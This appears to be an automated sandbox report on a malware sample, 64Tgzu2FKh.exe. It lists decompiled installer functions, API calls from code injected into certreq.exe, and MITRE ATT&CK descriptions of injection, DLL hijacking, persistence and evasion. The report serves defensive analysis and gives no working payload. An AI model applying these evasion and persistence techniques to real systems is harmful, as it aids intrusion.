C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 00405C2B, 00405C30, 00405C36, 00405C77, 00405C7D, 00405C85, 00405C8D

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp
API String ID: 3248276644-3545633897
Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405224(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236d4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236d4 = _t16;
							E00404BFA();
						}
						L11:
						return CallWindowProcW( *0x4236dc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B7A(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040422D(0x413);
				return 0;
			}

0x00405228
0x00405232
0x0040524e
0x00405270
0x00405273
0x00405279
0x00405283
0x00405284
0x00405286
0x0040528c
0x0040528c
0x00405296
0x00000000
0x004052a4
0x0040525b
0x00405293
0x00405293
0x00000000
0x00405293
0x00405267
0x00405269
0x00000000
0x00405269
0x00405238
0x00000000
0x00000000
0x0040523f
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405253
CallWindowProcW.USER32(?,?,?,?), ref: 004052A4

Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F

Strings

, xrefs: 00405234

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D

Uniqueness

Uniqueness Score: -1.00%

Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ac;
				_t3 = E004038AA(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ac =  *0x4216ac & 0x00000000;
				return _t3;
			}

0x004038c6
0x004038ce
0x004038d5
0x004038d8
0x004038d8
0x004038da
0x004038df
0x004038e6
0x004038ec
0x004038f0
0x004038f1
0x004038f9

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75333420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
GlobalFree.KERNEL32(?), ref: 004038E6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B69(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405b6a
0x00405b74
0x00405b77
0x00405b7d
0x00405b7e
0x00405b7f
0x00405b87
0x00000000
0x00000000
0x00000000
0x00405b87
0x00405b89
0x00405b91

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\64Tgzu2FKh.exe,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\64Tgzu2FKh.exe,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F

Strings

C:\Users\user\Desktop, xrefs: 00405B69

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CA3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cb3
0x00405cb5
0x00405cb8
0x00405ce4
0x00405cbd
0x00405cc6
0x00405ccb
0x00405cd6
0x00405cd9
0x00405cf5
0x00405cdb
0x00405ce2
0x00000000
0x00405ce2
0x00405cee
0x00405cf2
0x00405cf2
0x00405cec
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 64Tgzu2FKh.exePID: 4832, Parent PID: 11260COMMON

Executed Functions

Function 000802BF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,00000000,?,?), ref: 000802FE
VirtualAlloc.KERNEL32(00000000,00400000,00001000,?), ref: 0008034C
LocalFree.KERNELBASE(00000000), ref: 000803BB

Strings

,, xrefs: 0008032E

Memory Dump Source

Source File: 0000000B.00000003.2048115111.0000000000080000.00000020.00001000.00020000.00000000.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_3_80000_64Tgzu2FKh.jbxd

Similarity

API ID: AllocLocal$FreeVirtual
String ID: ,
API String ID: 1791776162-3772416878
Opcode ID: e3acfca55933822c155660506bd812470d889a6c1c683faf6f7b57039a729d84
Instruction ID: 4ccf0168e91be1077500c9e66ff671c0e9268d121b2881e7b2e5f1170af9cd34
Opcode Fuzzy Hash: e3acfca55933822c155660506bd812470d889a6c1c683faf6f7b57039a729d84
Instruction Fuzzy Hash: EC413D75900706EBCB50EF69C885AAFBBF8FF08354F14841AF959A7201D770EA44CB60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008026A Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000003.2048115111.0000000000080000.00000020.00001000.00020000.00000000.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_3_80000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction ID: 692229e2181a2fe5168e17bc909d6d40c47d6f723f72201fcf37737fb541d2c9
Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction Fuzzy Hash: C6F06D79601300CFCBA4EF49C55C895B7F6FB8572076541A5D8449B322D3F0ED88CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: certreq.exePID: 9536, Parent PID: 5432COMMON

Executed Functions

Function 0000022344E630A7 Relevance: 10.9, APIs: 7, Instructions: 390memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0000022344E637E8
RtlAllocateHeap.NTDLL ref: 0000022344E63845
NtAcceptConnectPort.NTDLL ref: 0000022344E6392F
NtAcceptConnectPort.NTDLL ref: 0000022344E639BC
NtAcceptConnectPort.NTDLL ref: 0000022344E63A7B
RtlDeleteBoundaryDescriptor.NTDLL ref: 0000022344E63A98
RtlDeleteBoundaryDescriptor.NTDLL ref: 0000022344E63AAA

Memory Dump Source

Source File: 0000000C.00000003.2264930703.0000022344E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022344E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22344e60000_certreq.jbxd

Similarity

API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
String ID:
API String ID: 3472209132-0
Opcode ID: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
Instruction ID: 0ccb1361d5c0047a01fed27bd5364d91105ce4519baabfaeb6411e6f2b1d0c96
Opcode Fuzzy Hash: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
Instruction Fuzzy Hash: D3C1CC30618B089FDB54EF58C488B6AB3E1FB94710F40456DE58EC7296DF34D986CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000022344E63388 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0000022344E634FF
RtlAllocateHeap.NTDLL ref: 0000022344E63652
RtlDeleteBoundaryDescriptor.NTDLL ref: 0000022344E636D1

Strings

l, xrefs: 0000022344E633AE

Memory Dump Source

Source File: 0000000C.00000003.2264930703.0000022344E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022344E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22344e60000_certreq.jbxd

Similarity

API ID: AllocateHeap$BoundaryDeleteDescriptor
String ID: l
API String ID: 2279964584-2517025534
Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction ID: 7fb13c8b049714d98d3479ef2be402aabd4644101b5ff9218cc86cebe7654bcc
Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction Fuzzy Hash: 71A137316186585BD729FE28C8896BB77D1FB94710F5009BEE9C7C3193DD28DA83C681

Uniqueness

Uniqueness Score: -1.00%

Function 0000022344E6536C Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0000022344E653BD

Memory Dump Source

Source File: 0000000C.00000003.2264930703.0000022344E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022344E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22344e60000_certreq.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction ID: 891bbf84b2f4db1dd479b65af4f24efa002db8ea283cc3bc7ee72a8c052cceb8
Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction Fuzzy Hash: D7017131710A056BE768EB6CD88C73673E1F758721F540679A405C3295DB78EDD1C780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

